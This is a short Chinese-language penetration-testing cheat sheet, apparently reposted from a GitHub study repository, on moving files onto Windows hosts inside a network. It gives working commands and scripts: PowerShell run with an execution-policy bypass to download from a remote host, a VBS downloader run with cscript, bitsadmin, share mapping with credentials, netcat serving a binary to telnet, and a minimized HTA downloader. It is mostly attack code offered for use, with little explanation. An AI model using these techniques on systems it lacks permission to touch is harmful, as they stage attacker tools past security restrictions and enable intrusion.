内网文件传输

转自：https://github.com/l3m0n/pentest_study
windows下文件传输
1、powershell文件下载 powershell突破限制执行：powershell -ExecutionPolicy Bypass -File .\1.ps1

$d = New-Object System.Net.WebClient
$d.DownloadFile("http://lemon.com/file.zip","c:/1.zip")

2、vbs脚本文件下载

Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.206.101/file.zip",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "c:\file.zip",2

下载执行：

cscript test.vbs

3、bitsadmin win03测试没有,win08有

bitsadmin /transfer n http://lemon.com/file.zip c:\1.zip

4、文件共享 映射了一个，结果没有权限写

net use x: \\127.0.0.1\share /user:centoso.com\userID myPassword

5、使用telnet接收数据

服务端：nc -lvp 23 < nc.exe
下载端：telnet ip -f c:\nc.exe

6、hta 保存为.hta文件后运行

<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.206.101/demo.php.zip",false);
Object.send();
if (Object.Status == 200)
{
var Stream = new ActiveXObject("ADODB.Stream");
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.SaveToFile("C:\\demo.zip", 2);
Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</head>
<body>
</body>
</html>